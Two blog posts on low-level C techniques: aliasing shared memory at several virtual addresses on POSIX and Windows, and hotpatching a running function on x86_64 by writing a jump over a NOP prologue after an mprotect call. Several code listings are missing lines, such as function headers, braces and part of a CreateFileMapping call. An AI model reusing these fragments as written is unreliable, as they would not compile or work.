This functionality allows for a neat hack: A physical memory address can be mapped to multiple virtual memory addresses at the same time. A process running with such a mapping will see these regions of memory as aliased — views of the same physical memory. A store to one of these addresses will simultaneously appear across all of them.

Some useful applications of this feature include:

Both POSIX and Win32 allow user space applications to create these aliased mappings. The original purpose for these APIs is for shared memory between processes, where the same physical memory is mapped into two different processes’ virtual memory. But the OS doesn’t stop us from mapping the shared memory to a different address within the same process.

POSIX Memory Mapping

On POSIX systems (Linux, *BSD, OS X, etc.), the three key functions are shm_open(3), ftruncate(2), and mmap(2).

First, create a file descriptor to shared memory using shm_open. It has very similar semantics to open(2).

int shm_open(const char *name, int oflag, mode_t mode);

The name works much like a filesystem path, but is actually a different namespace (though on Linux it is a tmpfs mounted at /dev/shm). Resources created here (O_CREAT) will persist until explicitly deleted (shm_unlink(3)) or until the system reboots. It’s an oversight in POSIX that a name is required even if we never intend to access it by name. File descriptors can be shared with other processes via fork(2) or through UNIX domain sockets, so a name isn’t strictly required.

OpenBSD introduced shm_mkstemp(3) to solve this problem, but it’s not widely available. On Linux, as of this writing, the O_TMPFILE flag may or may not provide a fix (it’s undocumented).

The portable workaround is to attempt to choose a unique name, open the file with O_CREAT | O_EXCL (either atomically create the file or fail), shm_unlink the shared memory object as soon as possible, then cross our fingers. The shared memory object will still exist (the file descriptor keeps it alive) but will not longer be accessible by name.

int fd = shm_open("/example", O_RDWR | O_CREAT | O_EXCL, 0600);
if (fd == -1)
    handle_error(); // non-local exit

The shared memory object is brand new (O_EXCL) and is therefore of zero size. ftruncate sets it to the desired size. This does not need to be a multiple of the page size. Failing to allocate memory will result in a bus error on access.

size_t size = sizeof(uint32_t);
ftruncate(fd, size);

Finally mmap the shared memory into place just as if it were a file. We can choose an address (aligned to a page) or let the operating system choose one for use (NULL). If we don’t plan on making any more mappings, we can also close the file descriptor. The shared memory object will be freed as soon as it completely unmapped (munmap(2)).

int prot = PROT_READ | PROT_WRITE;
uint32_t *a = mmap(NULL, size, prot, MAP_SHARED, fd, 0);
uint32_t *b = mmap(NULL, size, prot, MAP_SHARED, fd, 0);

At this point both a and b have different addresses but point (via the page table) to the same physical memory. Changes to one are reflected in the other. So this:

*a = 0xdeafbeef;
printf("%p %p 0x%x\n", a, b, *b);

Will print out something like:

0x6ffffff0000 0x6fffffe0000 0xdeafbeef

It’s also possible to do all this only with open(2) and mmap(2) by mapping the same file twice, but you’d need to worry about where to put the file, where it’s going to be backed, and the operating system will have certain obligations about syncing it to storage somewhere. Using POSIX shared memory is simpler and faster.

Windows Memory Mapping

Windows is very similar, but directly supports anonymous shared memory. The key functions are CreateFileMapping, and MapViewOfFileEx.

First create a file mapping object from an invalid handle value. Like POSIX, the word “file” is used without actually involving files.

size_t size = sizeof(uint32_t);
                             0, size,

There’s no truncate step because the space is allocated at creation time via the two-part size argument.

Then, just like mmap:

uint32_t *a = MapViewOfFile(h, FILE_MAP_ALL_ACCESS, 0, 0, size);
uint32_t *b = MapViewOfFile(h, FILE_MAP_ALL_ACCESS, 0, 0, size);

If I wanted to choose the target address myself, I’d call MapViewOfFileEx instead, which takes the address as additional argument.

From here on it’s the same as above.

Generalizing the API

Having some fun with this, I came up with a general API to allocate an aliased mapping at an arbitrary number of addresses.

int  memory_alias_map(size_t size, size_t naddr, void **addrs);
void memory_alias_unmap(size_t size, size_t naddr, void **addrs);

Values in the address array must either be page-aligned or NULL to allow the operating system to choose, in which case the map address is written to the array.

It returns 0 on success. It may fail if the size is too small (0), too large, too many file descriptors, etc.

Pass the same pointers back to memory_alias_unmap to free the mappings. When called correctly it cannot fail, so there’s no return value.

The full source is here: memalias.c


Starting with the simpler of the two functions, the POSIX implementation looks like so:

memory_alias_unmap(size_t size, size_t naddr, void **addrs)
    for (size_t i = 0; i < naddr; i++)
        munmap(addrs[i], size);

The complex part is creating the mapping:

memory_alias_map(size_t size, size_t naddr, void **addrs)
    char path[128];
    snprintf(path, sizeof(path), "/%s(%lu,%p)",
             __FUNCTION__, (long)getpid(), addrs);
    int fd = shm_open(path, O_RDWR | O_CREAT | O_EXCL, 0600);
    if (fd == -1)
        return -1;
    ftruncate(fd, size);
    for (size_t i = 0; i < naddr; i++) {
        addrs[i] = mmap(addrs[i], size,
                        PROT_READ | PROT_WRITE, MAP_SHARED,
                        fd, 0);
        if (addrs[i] == MAP_FAILED) {
            memory_alias_unmap(size, i, addrs);
            return -1;
    return 0;

The shared object name includes the process ID and pointer array address, so there really shouldn’t be any non-malicious name collisions, even if called from multiple threads in the same process.

Otherwise it just walks the array setting up the mappings.


The Windows version is very similar.

memory_alias_unmap(size_t size, size_t naddr, void **addrs)
    for (size_t i = 0; i < naddr; i++)

Since Windows tracks the size internally, it’s unneeded and ignored.

memory_alias_map(size_t size, size_t naddr, void **addrs)
    HANDLE m = CreateFileMapping(INVALID_HANDLE_VALUE,
                                 0, size,
    if (m == NULL)
        return -1;
    for (size_t i = 0; i < naddr; i++) {
        addrs[i] = MapViewOfFileEx(m, access, 0, 0, size, addrs[i]);
        if (addrs[i] == NULL) {
            memory_alias_unmap(size, i, addrs);
            return -1;
    return 0;

In the future I’d like to find some unique applications of these multiple memory views.

tags: [ c linux win32 ]

Hotpatching a C Function on x86

In this post I’m going to do a silly, but interesting, exercise that should never be done in any program that actually matters. I’m going write a program that changes one of its function definitions while it’s actively running and using that function. Unlike last time, this won’t involve shared libraries, but it will require x86_64 and GCC. Most of the time it will work with Clang, too, but it’s missing an important compiler option that makes it stable.

If you want to see it all up front, here’s the full source: hotpatch.c

Here’s the function that I’m going to change:


It’s dead simple, but that’s just for demonstration purposes. This will work with any function of arbitrary complexity. The definition will be changed to this:

    static int x;
    printf("goodbye %d\n", x++);

I was only going change the string, but I figured I should make it a little more interesting.

Here’s how it’s going to work: I’m going to overwrite the beginning of the function with an unconditional jump that immediately moves control to the new definition of the function. It’s vital that the function prototype does not change, since that would be a far more complex problem.

But first there’s some preparation to be done. The target needs to be augmented with some GCC function attributes to prepare it for its redefinition. As is, there are three possible problems that need to be dealt with:

The solution is the ms_hook_prologue function attribute. This tells GCC to put a hotpatch prologue on the function: a big, fat, 8-byte NOP that I can safely clobber. This idea originated in Microsoft’s Win32 API, hence the “ms” in the name.

The solution is the aligned function attribute, ensuring the hotpatch prologue is properly aligned.

As you might have guessed, this is primarily fixed with the noinline function attribute. Since GCC may also clone the function and call that instead, so it also needs the noclone attribute.

Even further, if GCC determines there are no side effects, it may cache the return value and only ever call the function once. To convince GCC that there’s a side effect, I added an empty inline assembly string (__asm("")). Since puts() has a side effect (output), this isn’t truly necessary for this particular example, but I’m being thorough.

What does the function look like now?

__attribute__ ((ms_hook_prologue))
__attribute__ ((aligned(8)))
__attribute__ ((noinline))
__attribute__ ((noclone))

And what does the assembly look like?

$ objdump -Mintel -d hotpatch
0000000000400848 <hello>:
  400848:       48 8d a4 24 00 00 00    lea    rsp,[rsp+0x0]
  40084f:       00
  400850:       bf d4 09 40 00          mov    edi,0x4009d4
  400855:       e9 06 fe ff ff          jmp    400660 <puts@plt>

It’s 8-byte aligned and it has the 8-byte NOP: that lea instruction does nothing. It copies rsp into itself and changes no flags. Why not 8 1-byte NOPs? I need to replace exactly one instruction with exactly one other instruction. I can’t have another thread in between those NOPs.


Next, let’s take a look at the function that will perform the hotpatch. I’ve written a generic patching function for this purpose. This part is entirely specific to x86.

hotpatch(void *target, void *replacement)
    assert(((uintptr_t)target & 0x07) == 0); // 8-byte aligned?
    void *page = (void *)((uintptr_t)target & ~0xfff);
    mprotect(page, 4096, PROT_WRITE | PROT_EXEC);
    uint32_t rel = (char *)replacement - (char *)target - 5;
    union {
        uint8_t bytes[8];
        uint64_t value;
    } instruction = { {0xe9, rel >> 0, rel >> 8, rel >> 16, rel >> 24} };
    *(uint64_t *)target = instruction.value;
    mprotect(page, 4096, PROT_EXEC);

It takes the address of the function to be patched and the address of the function to replace it. As mentioned, the target must be 8-byte aligned (enforced by the assert). It’s also important this function is only called by one thread at a time, even on different targets. If that was a concern, I’d wrap it in a mutex to create a critical section.

There are a number of things going on here, so let’s go through them one at a time:

Make the function writeable

The .text segment will not be writeable by default. This is for both security and safety. Before I can hotpatch the function I need to make the function writeable. To make the function writeable, I need to make its page writable. To make its page writeable I need to call mprotect(). If there was another thread monkeying with the page attributes of this page at the same time (another thread calling hotpatch()) I’d be in trouble.

It finds the page by rounding the target address down to the nearest 4096, the assumed page size (sorry hagepages). Warning: I’m being a bad programmer and not checking the result of mprotect(). If it fails, the program will crash and burn. It will always fail systems with W^X enforcement, which will likely become the standard in the future. Under W^X (“write XOR execute”), memory can either be writeable or executable, but never both at the same time.

What if the function straddles pages? Well, I’m only patching the first 8 bytes, which, thanks to alignment, will sit entirely inside the page I just found. It’s not an issue.

At the end of the function, I mprotect() the page back to non-writeable.

Create the instruction

I’m assuming the replacement function is within 2GB of the original in virtual memory, so I’ll use a 32-bit relative jmp instruction. There’s no 64-bit relative jump, and I only have 8 bytes to work within anyway. Looking that up in the Intel manual, I see this:

Fortunately it’s a really simple instruction. It’s opcode 0xE9 and it’s followed immediately by the 32-bit displacement. The instruction is 5 bytes wide.

To compute the relative jump, I take the difference between the functions, minus 5. Why the 5? The jump address is computed from the position after the jump instruction and, as I said, it’s 5 bytes wide.

I put 0xE9 in a byte array, followed by the little endian displacement. The astute may notice that the displacement is signed (it can go “up” or “down”) and I used an unsigned integer. That’s because it will overflow nicely to the right value and make those shifts clean.

Finally, the instruction byte array I just computed is written over the hotpatch NOP as a single, atomic, 64-bit store.

    *(uint64_t *)target = instruction.value;

Other threads will see either the NOP or the jump, nothing in between. There’s no synchronization, so other threads may continue to execute the NOP for a brief moment even through I’ve clobbered it, but that’s fine.

Trying it out

Here’s what my test program looks like:

void *
worker(void *arg)
    for (;;) {
    return NULL;

    pthread_t thread;
    pthread_create(&thread, NULL, worker, NULL);
    hotpatch(hello, new_hello);
    pthread_join(thread, NULL);
    return 0;

I fire off the other thread to keep it pinging at hello(). In the main thread, it waits until I hit enter to give the program input, after which it calls hotpatch() and changes the function called by the “worker” thread. I’ve now changed the behavior of the worker thread without its knowledge. In a more practical situation, this could be used to update parts of a running program without restarting or even synchronizing.

Further Reading

These related articles have been shared with me since publishing this article:

tags: [ x86 c linux ]